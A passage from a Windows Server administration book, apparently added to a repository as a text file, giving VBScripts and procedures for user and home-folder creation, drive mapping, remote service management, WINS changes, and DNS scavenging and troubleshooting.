+Set objUser = GetObject("WinNT://" _
+& strDomain & "/" _
+& strUserName & ",user")
+For Each objGroup In objUser.Groups
+CreateMemberOfObject.Add objGroup.Name, "-"
+Next
+Set objUser = Nothing
+End Function
+Running the Hack
+To map drives based on a different user group than Domain
+Admins modify this line as required:
+If MemberOf(ObjGroupDict, "Domain Admins") Then
+For example, if you want to map drives based on whether users
+are members of a global group named Sales use this line
+instead:
+If MemberOf(ObjGroupDict, "Sales") Then
+
+To map drives instead of displaying a message box, comment
+out the following line:
+wscript.echo "Is a member of Domain Admins." 'REM this line to Map Network Drives
+and uncomment these lines:
+'WSHNetwork.MapNetworkDrive "O:", "\\server1\share"
+'WSHNetwork.MapNetworkDrive "Q:", "\\server2\share"
+specifying drive letters and UNC paths as appropriate depending
+on your own networking environment. For example, to map the
+drive letter K: to a shared folder named Reports on file server
+fs3.mtit.com use this line instead of the above:
+WSHNetwork.MapNetworkDrive "K:", "\\fs3.mtit.com\Reports"
+Hans Schefske
+
+Hack 33 Script Creation of a User's
+Home Directory and Permissions
+Configuring home directories for users is a slow process using
+the GUI. Here's a script that does it faster.
+Ever wish you could create a user and her home directory and
+set the necessary permissions on that directory all in one
+script? Here is a sample script that shows you how to
+accomplish this. If you know some VBScript, you can easily
+customize it further to meet your needs.
+This script creates a user, adds additional properties such as
+telephone number and title, sets the password, and enables the
+user's account. Then the script creates the user's home folder
+and sets the Administrators group to have Full Control
+permission on the folder and the user's account to have Change
+permission on the folder. This script can easily be modified to
+set the permissions to fit the requirements of any environment.
+All you have to do is review the command-line switches for the
+cacls command and make the appropriate changes in the script.
+The Code
+To use this script, type it into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as
+
+CreateUserHomeDirectory.vbs.
+Option Explicit
+Const WAIT_ON_RETURN = True
+Const HIDE_WINDOW = 0
+Const USER_ROOT_UNC = "\\dc1\users" 'Set Home Folder Location Here
+Dim WshShell, WshNetwork, objFS, objServer, objShare
+Set WshShell = Wscript.CreateObject("Wscript.Shell")
+Set WshNetwork = WScript.CreateObject("WScript.Network")
+Set objFS = CreateObject("Scripting.FileSystemObject")
+Set ou = GetObject("LDAP://OU=Users,OU=Billing,OU=Network,DC=my,DC=domain,DC=com")
+'Create the User
+Set usr = ou.Create("user", "CN=James Smith")
+usr.Put "samAccountName", "jsmith"
+usr.Put "sn", "Smith"
+
+usr.Put "givenName", "James"
+usr.Put "userPrincipalName", "jsmith@my.domain.com"
+usr.Put "telephoneNumber", "(555) 555 0111"
+usr.Put "title", "Network Billing Dept"
+usr.SetInfo
+'Now that the user is created, reset their password and enable the account.
+usr.SetPassword "secret***!"
+usr.AccountDisabled = False
+usr.SetInfo
+'Now create the User's Home Folder and set permissions.
+strUser = usr.samAccountName
+Call objFS.CreateFolder(USER_ROOT_UNC & "\" & strUser)
+Call WshShell.Run("cacls " & USER_ROOT_UNC & "\" & strUser & _
+" /e /g Administrators:F", HIDE_WINDOW, WAIT_ON_RETURN)
+Call WshShell.Run("cacls " & USER_ROOT_UNC & "\" & strUser & _
+
+" /e /g " & strUser & ":C", HIDE_WINDOW, WAIT_ON_RETURN)
+Running the Hack
+To run the script, modify the following line to set the home folder
+location:
+Const USER_ROOT_UNC = "\\dc1\users" 'Set Home Folder Location Here
+Then modify the following line to specify the organizational unit
+(OU) in which you want to create the user:
+Set ou = GetObject("LDAP://OU=Users,OU=Billing,OU=Network,DC=my,DC=domain,DC=com")
+Finally, modify the following lines to specify the personal
+information for the user, as desired:
+Set usr = ou.Create("user", "CN=James Smith")
+usr.Put "samAccountName", "jsmith"
+usr.Put "sn", "Smith"
+usr.Put "givenName", "James"
+usr.Put "userPrincipalName", "jsmith@my.domain.com"
+usr.Put "telephoneNumber", "(555) 555 0111"
+usr.Put "title", "Network Billing Dept"
+Hans Schefske
+
+Hack 34 Prevent Ordinary Users from
+Creating Local Accounts
+Here's a quick hack that will let you prevent users from creating
+new local user accounts on their desktop computers.
+By default, ordinary users on Windows 2000 Professional
+workstations can use Computer Management to create new local
+user accounts on their machines. All they need to do is right-
+click on My Computer, select Manage to open Computer
+Management, locate Local Users and Groups under System
+Tools, right-click on Users, and select New User. This procedure
+lets them create ordinary user accounts only, not administrator
+accounts, but it still represents an undesirable loophole for most
+administrators. After all, it's usually not a desirable feature for
+users to create additional accounts for themselves on their
+desktop machines.
+Here's a workaround to solve this problem. To disable a user's
+ability to create new local accounts on his machine, log on
+locally to his machine as a member of the Administrators group
+and open Computer Management. Select Groups under Local
+Users and Groups to display all local groups on the machine.
+Double-click on the Users group to display its members (see
+Figure 3-6), and you should see NT AUTHORITY\INTERACTIVE as a
+member of this group. Select this account and click Remove to
+remove it from the group (this doesn't delete the account; it only
+removes it from the group).
+
+Figure 3-6. Removing the INTERACTIVE special
+identity from the Users group
+This action removes the ability for logged-on users to create
+new local accounts on their systems.
+If you don't want to log on interactively to user's machines using
+your Administrator account, you can use the runas command
+instead. While the user is logged on to her machine using her
+ordinary user account, open a command line and type:
+runas /user:MyAdminAcct@MyDomain.com cmd
+
+Type your password when prompted (make sure the user is not
+looking at the screen). This opens a new command-prompt
+window, running under your Administrator credentials. Now type
+the following command into the new window:
+net localgroup users "NT AUTHORITY\INTERACTIVE" /DELETE
+This removes the INTERACTIVE special identity from the Users
+group.
+Rod Trent
+
+Hack 35 Put a Logoff Icon on the
+Desktop
+Here's a script that will enable users to safely reboot their
+machines when necessary.
+Occasionally, users need a way to reboot their machines when
+applications hang or updates have been installed. Rather than
+give users instructions about how to do this properly, it would be
+nice if a user could instead simply click on an icon that would log
+them off properly and reboot their machine in a way that does not
+endanger their work.
+That's what this script is aboutallowing your users to safely
+reboot their machines from an icon on their desktops. This
+VBScript prompts the user to make sure he has saved his data,
+then logs the user off and automatically reboots. This is quite
+handy when you push updates via SMS but suppress the reboot.
+The Code
+Just type the following script into Notepad (with Word Wrap
+disabled) and save it with a .vbs extension as LogoffIcon.vbs:
+Set OpSysSet = GetObject("winmgmts:{impersonationLevel=impersonate,(Shutdown)}" & _
+"//./root/cimv2").ExecQuery("SELECT * FROM " & _
+
+"Win32_OperatingSystem WHERE Primary = true")
+ianswer = MsgBox("Did you save your data first?"+vbLf++vbLf+ " LOGOFF?", _
+vbCritical + vbYesNo, _
+"Logoff?")
+If ianswer = vbYes Then 'If OK, shut down
+For Each OpSys In OpSysSet
+outParam = OpSys.Reboot
+If err.number <> 0 Then
+WScript.echo "Error number: " & Err.Number & _
+vbNewLine & _
+"Description: " & Err.Description
+End If
+
+Next
+Else ' user selected cancel
+MsgBox "Logoff Aborted", , "Logoff Aborted"
+End If
+Copy the script to a folder on the user's machine and create a
+shortcut to the folder on his desktop. Then, when the user needs
+to reboot his machine, he can double-click on the shortcut and a
+dialog box (see Figure 3-7) will suggest that he save his work
+before logging off.
+Figure 3-7. Logging off and rebooting
+Once he saves his work and clicks OK, he is logged off and his
+computer shuts down and restarts.
+Chuck Young
+
+Chapter 4. Networking
+Services
+Hacks #36-47
+Section 36. Manage Services on Remote Machines
+Section 37. Simplify DNS Aging and Scavenging
+Section 38. Troubleshoot DNS
+Section 39. Manually Recreate a Damaged WINS
+Database
+Section 40. Change WINS for All Enabled Adapters
+Section 41. Ensure DHCP Server Availability
+Section 42. Change a Network Adapter's IP Info
+Section 43. Change from Static IP to DHCP
+Section 44. Release and Renew IP Addresses
+Section 45. Use netsh to Change Configuration
+Settings
+Section 46. Remove Orphaned Network Cards
+Section 47. Implement Windows 2000 Network Load
+Balancing
+
+Hacks #36-47
+Under the hood of Windows 2000 Server and Windows Server
+2003 are the core networking services and components that
+enable systems to communicate across a network. This includes
+services such as Dynamic Host Configuration Protocol (DHCP),
+Domain Name System (DNS), Windows Internet Name Service
+(WINS), and other services that run on top of TCP/IP.
+Configuring these services can be complex, and it can be hard to
+pinpoint the problem when things go wrong.
+This chapter is about managing key services and other
+networking components. You'll learn how to use a script to
+manage services on remote computers, how to ensure DHCP
+server availability so your clients can communicate, how DNS
+aging and scavenging work and can be configured, how to
+troubleshoot common DNS problems when Active Directory is
+deployed, how to perform complicated network configuration
+tasks using scripts and from the command line, and several
+other important tasks.
+When running VB scripts for system administration, remember to
+ensure that you have the latest scripting engines on the
+workstation from which you run the scripts. Download the latest
+scripting engines from the Microsoft Scripting home page
+(http://msdn.microsoft.com/scripting/). Also, when working with
+the Active Directory Services Interface (ADSI), you must have
+the same applicable rights you need to use the built-in
+administrative tools. In other words, you should use an
+administrator account to run these scripts.
+
+Hack 36 Manage Services on Remote
+Machines
+Here are three handy scripts for managing network services that
+run on remote machines.
+While the Services node in Computer Management can be used
+to manage services on remote machines, using a script is easier
+if you have many systems to manage. This hack offers three VB
+scripts you can use to display the services that run on a remote
+computer, change the start mode for a service, and change the
+password for the account used by a service. Enjoy!
+Getting Remote Computer Service
+Information
+If you want to check services on a remote computer, VBScript
+can help. Using the WMI repository and ADSI, you can easily
+retrieve information on stopped or started services.
+The script prompts for the NetBIOS name of the remote
+computer. Alternatively, you can get the service information for
+the local computer by typing in the local name as localhost. The
+script responds by displaying complete information for the
+services that are registered on the specified computer.
+
+The code
+Type the following script into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension:
+ComputerName = InputBox("Enter the name of the computer for which you " & _
+"want service information")
+winmgmt1 = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
+Set ServSet = GetObject( winmgmt1 ).InstancesOf ("Win32_service")
+for each Serv in ServSet
+GetObject("winmgmts:").InstancesOf ("win32_service")
+WScript.Echo ""
+WScript.Echo Serv.Description
+WScript.Echo " Executable: ", Serv.PathName
+WScript.Echo " Status: ", Serv.Status
+WScript.Echo " State: ", Serv.State
+WScript.Echo " Start Mode: ", Serv.StartMode
+
+Wscript.Echo " Start Name: ", Serv.StartName
+next
+Running the hack
+To run the script, open a command prompt, switch to the
+directory where the script is located, and type the following:
+cscript.exe GetRemoteServices.vbs > services.txt
+The reason for redirecting output to a text file is because the
+script generates a lot of output. A dialog box appears (see
+Figure 4-1), requesting the name of the remote machine. The
+machine name can be a FQDN, NetBIOS name, or IP address,
+as desired.
+Figure 4-1. Getting information about services
+running on a remote machine
+
+Here's a sample of what the output of the script might look like if
+the target machine is running Windows Server 2003:
+Microsoft (R) Windows Script Host Version 5.6
+Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
+Notifies selected users and computers of administrative alerts. If the service is stopped,
+programs that use administrative alerts will not receive them. If this service is
+disabled,
+any services that explicitly depend on it will fail to start.
+Executable: C:\WINDOWS\system32\svchost.exe -k LocalService
+Status: OK
+State: Stopped
+Start Mode: Disabled
+
+Start Name: NT AUTHORITY\LocalService
+Provides support for application level protocol plug-ins and enables network/protocol
+connectivity. If this service is disabled, any services that explicitly depend on it will
+fail to start.
+Executable: C:\WINDOWS\System32\alg.exe
+Status: OK
+State: Stopped
+Start Mode: Manual
+Start Name: NT AUTHORITY\LocalService
+Processes installation, removal, and enumeration requests for Active Directory
+IntelliMirror group policy programs. If the service is disabled, users will be unable to
+install, remove, or enumerate any IntelliMirror programs. If this service is disabled,
+any services that explicitly depend on it will fail to start.
+Executable: C:\WINDOWS\system32\svchost.exe -k netsvcs
+Status: OK
+
+State: Stopped
+Start Mode: Manual
+Start Name: LocalSystem
+Note that you can easily determine the start mode, service
+account, and state of each service from this output.
+Changing the Start Mode for a Service
+This VBScript changes the Server service start mode to
+Automatic and works remotely. This can be a big help to sites
+where the security folks have gone nuts and disabled the Server
+service or set it to Manual start mode.
+In its current form, the script prompts for a remote computer
+name, connects, and changes the Server service's start mode.
+The script could also be edited to run on the local computer and
+placed in a login script to hit a large number of computers at
+once.
+The code
+Type the following script into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension:
+strComputer = InputBox("Enter the name of the computer for which " & _
+"you want to change the Start Mode for the Server service")
+
+Set objWMIService = GetObject("winmgmts:" _
+& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
+Set colService = objWMIService.ExecQuery _
+("Select * from Win32_Service where DisplayName = 'Server'")
+For Each objService in colService
+errReturnCode = objService.Change( , , , , "Automatic")
+Next
+Running the hack
+To run this script, simply create a shortcut to it and double-click
+on the shortcut.
+To change the start mode of another service, simply change the
+DisplayName to the service you want to modify. For example, to
+change the start mode for the World Wide Web Publishing
+Service, you'd alter the select statement to read:
+("Select * from Win32_Service where DisplayName = 'w3svc'").
+And, of course, you can also use "Manual" or "Disabled" instead of
+"Automatic" in the second-to-last line.
+Changing a Service Password
+
+Services always run within the context of some user account.
+Usually, this account is built in, such as LocalSystem or
+NetworkService, but some services, such as IIS and those for
+Exchange, use special accounts called service accounts. To
+ensure these accounts are secure, you can change the password
+used by these accounts, which this script will allow you to do.
+The code
+Type the following script into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension:
+Dim Computer
+Dim ComputerName
+Dim ComputerDomain
+Dim Service
+Dim TargetService
+Dim NewPassword
+TargetService = "YourServicename"
+ComputerDomain = "YourDomain"
+ComputerName = "YourComputerName"
+NewPassword = "YourPassword"
+
+Set Computer = GetObject("WinNT://" & ComputerDomain & "/" & ComputerName & _ ",computer"
+Set Service = Computer.GetObject("service", TargetService)
+Service.SetPassword(NewPassword)
+Service.SetInfo
+Running the hack
+Just replace the items in the following lines with your own
+information:
+TargetService = "YourServicename"
+ComputerDomain = "YourDomain"
+ComputerName = "YourComputerName"
+NewPassword = "YourPassword"
+For example:
+TargetService = "Network Agent"
+ComputerDomain = "MTIT"
+ComputerName = "SRV14"
+NewPassword = "Pa$$w0rd"
+Rod Trent
+
+Hack 37 Simplify DNS Aging and
+Scavenging
+Understanding the mysteries of how DNS aging/scavenging
+works can save you time and effort troubleshooting DNS name-
+resolution problems.
+Dynamic DNS (DDNS, introduced in Windows 2000) brought
+with it a process called DNS scavenging, the automatic removal
+of stale DNS information. In a perfect world, DNS scavenging
+would not be necessary, but who lives in a perfect world? So,
+before you spend time reading the rest of this hack, let's see if it
+applies to you.
+Have you pinged a machine before by name and gotten a reply,
+but when you attempt to connect to it, you connect to a different
+machine name or cannot connect at all? If you just shook your
+head in agreement, nodded, or mumbled something about this
+happening to you, then this hack might shed some light.
+Still reading? Good. First, let me establish my bias: all of this
+information pertains to Active Directory Integrated Zones. That
+said, let's establish some definitions before we continue:
+A
+This record maps the name of the machine (host) to the
+IP address.
+
+PTR
+This record maps the IP address to the hostname.
+Why Scavenge?
+There are two parts of DDNS that you need to understand before
+we answer the question of when scavenging is necessary: DNS
+and DHCP.
+DHCP process
+Wait a second. I thought we were talking about DNS? Before we
+go on about DNS, we first have to understand how DDNS works
+and why DHCP is important in this process.
+Dynamic DNS registration happens at two places: either the
+DHCP client or the DHCP server. It all depends on configuration
+and client type. For the most part, Windows 2000 clients and
+above handle their own hostnameregistrations, while the DHCP
+server handles the PTR registration (except in the case of
+statically assigned IP addresses, in which case the client will
+handle both the hostnameand PTR registrations). In other
+configurations, the DHCP server can be made to handle the host
+and PTR registrations. Other, down-level clients (NT4, 9x, etc.),
+do not interact with the DDNS registration process. However, the
+DHCP server can be set to handle registration for these clients
+as well.
+
+Okay, now we have an idea of how these records are getting in
+DDNS. Unfortunately, how the records go in is much more
+efficient than how the records come out.
+Read Larry Duncan's excellent article, "DNS for
+Active Directory: A 10 Minute Primer"
+(http://www.myitforum.com/articles/16/view.asp?
+id=3907), to understand when clients likes to
+refresh their DNS records.
+DDNS process
+There's nothing to stop two records from holding the same IP
+address or the same host name. This scenario is problematic for
+image-based workstation/laptop deployments. During a portion
+of the image process, the client will register as WIN2KIMAGE in
+DNS (for example), before having the machine name changed
+later in the process. Another image is started and WIN2KIMAGE is
+added again with a different IP address. Sooner or later, you'll
+end up with 50 PTR records pointing to the same name,
+WIN2KIMAGE. This same process happens under different
+situations, in which a machine will establish a different dynamic
+IP address, but for some reason, the old reverse-lookup record
+is not removed. Generally, the DHCP client and server helps
+clean up these records. In some configurations, the DHCP
+
+server does it all. However, real-world experience might tell you
+that this is not getting done effectively. When this clean-up
+process does not occur properly, stale records reside in DNS.
+This is where scavenging comes in. Scavenging deletes stale
+records if they're beyond a set age. All records have an age.
+However, the age of a record is not considered until scavenging
+is turned on. Once scavenging is turned on, DNS does not
+calculate how old the record was prior to when scavenging was
+enabled.
+For more information on various triggers of the StartScavenging
+time frame, refer to the Microsoft DNS white paper at
+http://www.microsoft.com/technet/treeview/default.asp?
+url=/TechNet/prodtechnol/windows2000serv/plan/w2kdns2.asp
+How to Use Scavenging
+There are three intervals you need to understand before you set
+up scavenging: Scavenging Period, No-refresh Interval, and
+Refresh Interval. These intervals are described in the DNS GUI.
+Just right-click on an Active Directory Integrated zone, select
+Properties, choose the General tab, and click the Aging button
+to see the screen shown in Figure 4-2.
+Figure 4-2. Configuring DNS scavenging options
+
+If you're like me, your brain is twitching from the complex
+wording of the definitions. In order to understand this a little
+better (without needing the mental capacity to solve a Rubik's
+Cube in two minutes), let's break down what the definitions really
+mean:
+Scavenging Period
+This is easy enough to understand. This interval simply
+tells your DNS server how often to check the zones for
+stale records. You can only get as granular as telling
+
+DNS to check every x number of hours or x number of
+days. By the way, this setting applies only to the DNS
+server, not the zones.
+No-refresh Interval
+This a mechanism by which DDNS suppresses
+reregistration attempts. This helps keep replication of
+record information to a minimum. For example, using the
+default of seven days, after the DNS client registers with
+DDNS, all attempts to reregister for a period of seven
+days will be ignored.
+Refresh Interval
+This definition took awhile for me to grasp. It basically
+means the number of days after the No-refresh Interval
+expires that DDNS will wait for the client to refresh its
+record before the record becomes stale. Again, by
+default, this setting is also seven days.
+Now, we'll put this all together in an example that makes sense.
+In this scenario, the DNS client does not reregister during the
+Refresh Interval period. Keep in mind, we are using the default of
+seven days:
+1. DNS client registers with DDNS.
+No-refresh Interval starts (seven days).
+DDNS server will not accept reregistration attempts from
+
+this client for seven days.
+No-refresh Interval expires.
+Refresh Interval starts (seven days).
+DNS client has seven days to refresh its records before the
+record is considered stale.
+Refresh Interval expires.
+Scavenging process removes record.
+If the client had registered its record again, the No-refresh
+Interval would have started all over again. In the previous
+scenario, with the default settings of seven days, a record would
+have to be greater than 14 days old before DDNS would
+scavenge it. This might work if your DHCP lease times are eight
+days (the default). Otherwise, you might need to set the
+intervals closer to your DHCP lease times. Also, keep in mind
+the Scavenging Period runs only on the interval specified, which
+is also seven days by default.
+Scavenging jobs will use processor time. However, the
+scavenging process is a low-priority thread of the DNS service.
+This ensures that scavenging does not use all the processing
+capacity, but it's horrible if your DNS servers are used heavily.
+As a low-priority thread on a highly used DNS server, there's a
+probability that the scavenging thread might never run. Also, if
+the server attempts to run the scavenging process during a time
+when the DNS server is highly used, it will miss the scheduled
+
+interval. It will not attempt to start running over and over but
+instead will wait until the next scheduled interval (remember the
+default of seven days). At the time of this writing, I haven't found
+a setting that can be adjusted to change which hour the
+scavenging process starts.
+For the Advanced Pack Rat
+As I mentioned earlier, the Scavenging Period setting applies
+only to an individual DNS server. Unlike the other settings, which
+are replicated by Active Directory, this setting is specific to the
+DNS server in question. With this in mind, not enabling this
+setting means that no servers are scavenging records. Aging of
+records is taking place (No-refresh, Refresh), but nothing else is
+going on. This is good for a variety of reasons. First, you don't
+necessarily want all of your DNS servers to scavenge. You need
+only one server to scavenge. It'll replicate the record deletes to
+the other DNS servers. This also allows for some other
+configuration options:
+Small environment
+Turn Scavenging Period on. This should be ample for
+you.
+Larger environment
+Leave the Scavenging Period setting off. In other words,
+you don't want DNS servers scavenging records for you.
+Instead, use the dnscmd command (found in the Support
+
+Tools folder on your product CD) with the
+/StartScavenging option and schedule it on a recurring
+basis, at the time frame you're looking for. It's probably
+reasonable to suggest that nighttime hours have little
+DNS registrations or queries going on.
+Enterprise environment
+Designate a DNS server to handle all scavenging and
+nothing else. This can be established by placing the
+DNS server in its own site so that clients do not refer to
+it for lookups or any Active Directory functions. If that
+sounds like too much work, the SRV records for this
+DNS server can be stripped from DNS to achieve the
+same effect.
+See Also
+DNS Scavenging on Windows 2000 Server
+(http://www.microsoft.com/windows2000/en/server/help/default.asp?
+url=/WINDOWS2000/en/server/help/sag_DNS_imp_ManageAgingScavenging.htm
+Enable Aging and Scavenging for DNS
+(http://www.microsoft.com/technet/treeview/default.asp?
+url=/technet/prodtechnol/windowsserver2003/proddocs/deployguide/dssbm_drd_dvwv.asp
+Scavenging Stale DNS Records
+(http://www.winnetmag.com/Articles/Index.cfm?
+ArticleID=19897)
+
+Set Aging/Scavenging Properties for the DNS Server
+(http://www.microsoft.com/technet/treeview/default.asp?
+url=/technet/prodtechnol/windowsserver2003/proddocs/standard/sag_DNS_pro_SetAgeScavengeServer.asp
+How to Optimize the Location of a Domain Controller or
+Global Catalog (http://support.microsoft.com/?
+id=306602)
+Marcus Oh
+
+Hack 38 Troubleshoot DNS
+Here are some tips, tools, and resources to help you
+troubleshoot DNS problems on Windows 2000/2003-based
+networks.
+DNS troubleshooting is usually straightforward, because most
+errors tend to be simple configuration or setup errors. To
+troubleshoot DNS, you must have details of the configuration of
+any DNS resolvers and/or DNS servers and be able to use
+common DNS troubleshooting tools. This hack provides some
+details and links to tools you can use to troubleshoot DNS, as
+well as tips on how to overcome common DNS errors.
+DNS Troubleshooting Tools
+Here are a few useful web sites that offer tools for
+troubleshooting DNS:
+www.DNSreport.com (http://www.dnsreport.com)
+This site will check the DNS settings for an Internet
+zone and provide prescriptive guidance on optimizing the
+settings.
+
+www.DNSstuff.com (http://www.dnsstuff.com)
+This site has a number of DNS tools that you can use to
+diagnose DNS issues.
+SamSpade.org (http://www.samspade.org)
+This site has some good tools for DNS troubleshooting.
+It promotes its tools and expertise as anti-spam
+utilities, as opposed to just DNS troubleshooting. The
+site's tools page (http://www.samspade.org/t/) provides
+tools similar to those at www.DNSstuff.com. I have the
+Sam Spade For Windows tool
+(http://www.samspade.org/ssw/) on my desktop and use
+it a great deal.
+AnalogX DNSDig (http://www.analogx.com/contents/dnsdig.htm)
+This page provides an online version of DIGa useful tool
+from the Unix world that is used to troubleshoot DNS
+issues. (Why can't Microsoft provide a port of DIG in
+Windows or the resource kit?)
+Squish.net DNS Checker (http://www.squish.net/dnscheck)
+Given a record name and a record type, this page will
+return a report that details all possible answers.
+DNS Dump (http://www.reskit.net/DNS/dnsdump.cm_)
+
+This is a truly awesome script by Dean Wells that
+exports/imports DNS server configurations. Read
+carefully before using it, and make sure you change the
+extension before you run it!
+Troubleshooting Common DNS Issues
+Here is a list of common problems and solutions that have been
+discussed in online newsgroups:
+Running nslookup returns nonexistent domain
+If you run nslookup, you might see an error that looks like
+this:
+C:\>nslookup
+*** Can't find server name for address 192.168.1.1: Non-existent domain
+*** Default servers are not available
+Default Server: UnKnown
+Address: 192.168.1.1
+When nslookup starts, it attempts do a reverse lookup of
+the IP address of the DNS server. If the reverse lookup
+fails, nslookup returns the preceding error message,
+which is somewhat misleading. The solution is to either
+install a reverse lookup zone for your workstations or to
+ignore the message.
+
+Netlogon Error 5774 - DNS Operation Refused
+This error is typically caused by the use of a DNS server
+that does not allow dynamic update or is set to refuse
+operations from your computer. Sometimes, this is due
+to a workstation that points to the ISP's DNS server
+instead of an internal DNS server. In general, all internal
+servers and workstations should point to one or more
+internal DNS servers that in turn point to a DNS server
+that forwards to the Internet.
+DNS Error 414 - The specified domain either does not exist or could
+not be contacted
+This error usually occurs when the computer is
+configured without a DNS domain name. If the computer
+is a DNS server that has only a single label name (e.g.,
+kona2 versus kona2.reskit.net), any zone created will have
+the default SOA and NS records created using just a
+single label. This in turn will lead to invalid or failed
+referrals for the zone used to provide lookups for this
+zone.
+DNS Error 5504 - The DNS Server encountered an invalid domain
+name in a packet from X.X.X.X
+This error indicates that the DNS server has received a
+packet with an invalid domain name and the packet has
+been rejected. The most common cause of this is DNS
+cache pollution, as described in Knowledge Base (KB)
+article 241352
+
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;241352).
+Troubleshooting dynamic update problems
+Dynamic update is a DNS feature that enables hosts to
+update their DNS details at the DNS server. Although
+easy to set up, there are some ways in which DNS
+dynamic update can fail. See the KB article 287156 for
+more details
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;287156)
+Windows Server 2003 cannot resolve addresses that Windows 2000
+can
+In some cases, it appears that server is just not
+functioning and not resolving some names. The cause is
+that Extension Mechanisms for DNS (EDNS0) requests
+from the 2003 DNS server are not recognized by all
+other DNS servers. To resolve this, you should disable
+EDNS0 requests, using the DNScmd program from the
+Windows Server 2003 Support Tools folder and type
+dnscmd /config /enableednsprobes at a command prompt.
+DNS Newsgroups
+If the previous tips and tools do not help and you are using any
+version of Microsoft Windows (or DOS, for that matter), consider
+posting a query to the microsoft.public.win2000.dns newsgroup.
+
+This newsgroup can be obtained from
+news://news.microsoft.com. If you do post, you will need to
+provide some details of your particular issue, including most of
+all of the following:
+Is the problem a client problem or a DNS server
+problem?
+What operating system are you running and with which
+service packs or other fixes?
+What is the client configuration? (ipconfig /all provides
+this!)
+What specific error, if any, are you seeing?
+What zones are configured on your DNS server, and what
+properties are set for those zones?
+Are your DNS zones configured to be updated
+dynamically?
+What sort of Internet connection do you have? Does
+your ISP allow you to run servers on your connection?
+Does your provided IP address vary, or is it fixed?
+DNS Books
+
+Finally, here are two books you can use to learn more about
+troubleshooting DNS issues:
+DNS and BIND
+By Cricket Liu and Paul Ablitz (O'Reilly). This book is
+possibly the best introduction to DNS in existence. It's
+Unix-based, but it's still a good book.
+Windows 2000 DNS
+By Herman Knief, Roger Abell, Jeffery Graham, and
+Andrew Daniels (O'Reilly). This is a pretty good
+Windows 2000 DNS book.
+Thomas Lee
+
+Hack 39 Manually Recreate a Damaged
+WINS Database
+A corrupt WINS database can spell a host of problems and must
+be repaired if your network is to function properly. This hack
+shows you how to recreate a damaged WINS database.
+If you're still using WINS on your networktypically in a mixed
+NT/2000 or NT/2003 environment while migration is
+underwayyou might occasionally experience corruption of the
+Windows Internet Name Service (WINS) database. If your WINS
+database becomes corrupted, you can experience all manner of
+problems with your workstations and serversmost notably,
+name-resolution problems for legacy Windows clients. You'll
+need to fix your WINS database if these clients are to
+communicate on the network. This hack recreates a damaged
+Windows NT 4.0 or Windows 2000 WINS database.
+Windows NT 4.0
+To recreate a damaged WINS database on Windows NT, first go
+to Control Panel Services and stop the Windows Internet
+Name Service. Then, create a folder named WINS_OLD and move
+the contents of the %SystemRoot%\System32\WINS folder to
+WINS_OLD. Finally, restart the Windows Internet Name Service.
+When you are positive that the new WINS database is
+
+functioning properly, delete the WINS_OLD directory.
+Windows Server 2000/2003
+To recreate a damaged WINS database on Windows Sever
+2000/2003, first go to Control Panel Administrative Tools
+Services and stop the Windows Internet Name Service.
+Then, create a folder named WINS_OLD and move the contents of
+the %SystemRoot%\System32\WINS folder to WINS_OLD. Finally,
+restart the Windows Internet Name Service. When you are
+positive that the new WINS database is functioning properly,
+delete the WINS_OLD directory.
+The only difference between Windows NT
+4.0 and Windows 2000 for recreating a
+WINS database is the location for
+accessing the services.
+Again, when you are positive that the new WINS database is
+functioning properly, delete the WINS_OLD directory.
+Rod Trent
+
+Hack 40 Change WINS for All Enabled
+Adapters
+Changing WINS settings on client machines can be a pain when
+you have to move your WINS servers. This hack makes it easier.
+If you are using WINS as a name-resolution method (typically in
+a mixed NT/2000 environment) and have to change your WINS
+serversfor example, when you install a new WINS serveryou
+have to reconfigure WINS settings on all your client computers.
+If you are using DHCP, you can configure the 044 WINS/NBNS
+Servers option on your DHCP servers to provide client
+computers with new WINS servers addresses, but this requires
+releasing and renewing DHCP leases on all your clients.
+Here's another approach you can use. The following script
+changes the WINS server settings on client machines and is
+useful when you install new WINS servers and need to change
+your WINS server settings on workstations across the board.
+Note that the script also works on multihomed machines
+(machines that have two or more network adapters).
+The Code
+Type the following code into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as ChangeWINS.vbs:
+
+Option Explicit
+On Error Resume Next
+Dim objLocator, objService, NIC
+Dim strComputer, strUsername, strPassword
+Dim strWINS1, strWINS2
+Dim intErr
+strComputer = "."
+strUsername = ""
+strPassword = ""
+strWINS1 = "172.16.1.122"
+strWINS2 = "172.16.1.132"
+Set objLocator = CreateObject("WbemScripting.SWbemLocator")
+Set objService = objLocator.ConnectServer(strComputer, "root/cimv2", & strUsername,
+strPassword)
+
+objService.Security_.impersonationlevel = 3
+For Each NIC In objService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration
+Where IPEnabled=True")
+WScript.Echo "Nic Index: " & NIC.index
+WScript.Echo "Current Settings"
+WScript.Echo "Primary Wins Server: " & NIC.WINSPrimaryServer
+WScript.Echo "Secondary Wins Server: " & NIC.WINSSecondaryServer
+intErr = NIC.SetWinsServer(strWINS1, strWINS2)
+If intErr <> 0 Then Wscript.Echo "Error changing WINS"
+Next
+Set objService = Nothing
+Set objLocator = Nothing
+Running the Hack
+To run this hack, you first have to customize it. For example, if
+your primary WINS server is 10.0.0.15 and your secondary
+server is 10.0.0.16, change these lines:
+
+strWINS1 = "172.16.1.122"
+strWINS2 = "172.16.1.132"
+to this:
+strWINS1 = "10.0.0.15"
+strWINS2 = "10.0.0.16"
+Then, create a shortcut to the script and double-click on the
+shortcut to run the script. This will refresh your computer's
+WINS settings.
+Rod Trent
+
+Hack 41 Ensure DHCP Server Availability
+Making sure a DHCP server is always available is critical if your
+network uses dynamic TCP/IP addressing.
+Microsoft DHCP server became much more popular in Windows
+2000 environments, where it became part of the overall strategy
+for managing IP addressing, host namespace, and name
+resolution (due to its close integration with Microsoft's
+implementation of DNS). Because of its significance, it is
+imperative to have a solid plan that allows you to quickly
+recover from DHCP server failures.
+Installing Redundant DHCP Servers
+One approach to ensuring DHCP server availability is to install
+multiple DHCP servers and divide the list of available IP
+addresses on each subnet into multiple ranges, one per server.
+In the simplest case of two DHCP servers, configure each with
+the scopes that have matching start and end address. Next, for
